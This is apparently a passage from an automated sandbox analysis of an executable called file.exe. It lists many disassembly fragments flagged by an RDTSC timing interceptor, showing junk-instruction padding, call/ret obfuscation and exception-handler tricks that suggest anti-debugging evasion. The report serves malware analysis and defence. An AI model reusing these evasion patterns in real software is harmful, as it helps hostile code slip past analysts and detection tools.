Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF109 second address: DBF121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FF9ACE9409Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF121 second address: DBF127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF127 second address: DBF149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007FF9ACE94096h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF149 second address: DBF14F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBE8E5 second address: DBE8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBE8E9 second address: DBE8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBED08 second address: DBED0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBED0C second address: DBED10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC0B80 second address: DC0C38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FF9ACE940A1h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FF9ACE940A9h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c js 00007FF9ACE94098h 0x00000022 pushad 0x00000023 js 00007FF9ACE94096h 0x00000029 push edx 0x0000002a pop edx 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jmp 00007FF9ACE940A3h 0x00000036 pop eax 0x00000037 call 00007FF9ACE94099h 0x0000003c jmp 00007FF9ACE940A0h 0x00000041 push eax 0x00000042 jmp 00007FF9ACE940A1h 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b jmp 00007FF9ACE9409Dh 0x00000050 mov eax, dword ptr [eax] 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 jne 00007FF9ACE94096h 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f jbe 00007FF9ACE94096h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC0C38 second address: DC0C4C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC0D81 second address: DC0D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007FF9ACE94096h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 ja 00007FF9ACE94096h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC1348 second address: DC134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC134D second address: DC1353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC1353 second address: DC1357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC1828 second address: DC182C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC182C second address: DC183E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FF9ACEA2288h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC1968 second address: DC196F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC196F second address: DC1975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC1975 second address: DC1979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC23B6 second address: DC23BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC23BA second address: DC23BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC2CB2 second address: DC2CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC2CB8 second address: DC2CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC2CBC second address: DC2D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx edi, si 0x0000000e push 00000000h 0x00000010 jmp 00007FF9ACEA228Ah 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FF9ACEA2288h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov esi, dword ptr [ebp+122D231Eh] 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b ja 00007FF9ACEA2286h 0x00000041 pop eax 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5201 second address: DC5207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC7675 second address: DC770F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF9ACEA2293h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+1245CDF0h], ebx 0x00000012 mov dword ptr [ebp+12466B76h], eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FF9ACEA2288h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 push eax 0x00000035 xor edi, 1C614189h 0x0000003b pop edi 0x0000003c jmp 00007FF9ACEA2297h 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007FF9ACEA2288h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 0000001Ah 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d xchg eax, ebx 0x0000005e push esi 0x0000005f push eax 0x00000060 push edx 0x00000061 js 00007FF9ACEA2286h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC964D second address: DC9690 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007FF9ACE9409Eh 0x00000010 jmp 00007FF9ACE9409Ah 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF9ACE9409Eh 0x0000001d jmp 00007FF9ACE9409Fh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC9690 second address: DC96BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2295h 0x00000007 jmp 00007FF9ACEA2296h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDE58 second address: DCDED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx ebx, cx 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 jmp 00007FF9ACE940A8h 0x00000017 mov ebx, dword ptr [ebp+122D36D3h] 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FF9ACE94098h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a push ebx 0x0000003b mov bx, A6FDh 0x0000003f pop ebx 0x00000040 sub dword ptr [ebp+122D26CFh], eax 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDED3 second address: DCDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA2292h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEE3A second address: DCEE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE940A3h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEFEE second address: DCF003 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF9ACEA2288h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0E23 second address: DD0E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0075 second address: DD007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0E2C second address: DD0E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD007A second address: DD0080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0E30 second address: DD0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FF9ACE940A3h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF9ACE94098h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov bh, 8Eh 0x0000002a push 00000000h 0x0000002c sbb bx, 11ACh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FF9ACE94098h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 jmp 00007FF9ACE9409Bh 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FF9ACE940A6h 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0080 second address: DD0084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0EC8 second address: DD0EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0EE8 second address: DD0EF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF9ACEA2286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF31 second address: D8BF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF39 second address: D8BF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF3F second address: D8BF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF9ACE940A2h 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0FF4 second address: DD1010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA2297h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF61 second address: D8BF82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FF9ACE94096h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BF82 second address: D8BF86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1010 second address: DD1016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1016 second address: DD101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD35CA second address: DD35E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF9ACE94098h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD54B5 second address: DD5557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc bx, 6756h 0x00000011 and edi, 0228A1EBh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FF9ACEA2288h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 movzx edi, cx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FF9ACEA2288h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 adc bx, 2EA6h 0x00000057 mov bl, 9Ah 0x00000059 xchg eax, esi 0x0000005a jmp 00007FF9ACEA2295h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FF9ACEA2291h 0x00000067 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD46F1 second address: DD46F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD64D0 second address: DD64EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD568D second address: DD5692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5692 second address: DD5698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD5698 second address: DD569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD84BE second address: DD84C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD84C2 second address: DD84D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF9ACE9409Ch 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD84D4 second address: DD84EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF9ACEA2286h 0x00000009 jno 00007FF9ACEA2286h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jnc 00007FF9ACEA2286h 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A3D9 second address: D8A3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FF9ACE94096h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A3E7 second address: D8A404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF9ACEA2295h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8A8B second address: DD8A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACE9409Fh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8A9E second address: DD8B28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF9ACEA2296h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FF9ACEA2288h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push edx 0x0000002e or dword ptr [ebp+122D1840h], edi 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 or dword ptr [ebp+122D292Dh], esi 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007FF9ACEA2288h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D368Fh] 0x0000005f mov dword ptr [ebp+1249084Ch], eax 0x00000065 xchg eax, esi 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8B28 second address: DD8B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8B40 second address: DD8B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF9ACEA2286h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d je 00007FF9ACEA2294h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8B57 second address: DD8B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6673 second address: DD6677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6677 second address: DD6680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6680 second address: DD66A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jg 00007FF9ACEA2286h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF9ACEA228Eh 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD66A4 second address: DD66A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD66A8 second address: DD6719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push esi 0x00000009 jmp 00007FF9ACEA228Bh 0x0000000e pop ebx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, dword ptr [ebp+122D1813h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 adc ebx, 4A4D5C27h 0x00000029 mov eax, dword ptr [ebp+122D0719h] 0x0000002f mov ebx, dword ptr [ebp+122D2724h] 0x00000035 push FFFFFFFFh 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FF9ACEA2288h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 adc edi, 73125B47h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b ja 00007FF9ACEA2286h 0x00000061 push edi 0x00000062 pop edi 0x00000063 popad 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD99CF second address: DD99D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8DBE second address: DD8DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9B7D second address: DD9BAA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF9ACE9409Ch 0x00000008 jnp 00007FF9ACE94096h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF9ACE940A9h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB9C8 second address: DDB9CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9BAA second address: DD9C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF9ACE9409Ah 0x0000000f pop eax 0x00000010 popad 0x00000011 nop 0x00000012 mov ebx, dword ptr [ebp+122D37C3h] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov dword ptr [ebp+1246513Bh], eax 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c or edi, dword ptr [ebp+122D28E7h] 0x00000032 mov eax, dword ptr [ebp+122D099Dh] 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FF9ACE94098h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 add bx, E2D0h 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007FF9ACE94098h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 00000018h 0x0000006e inc 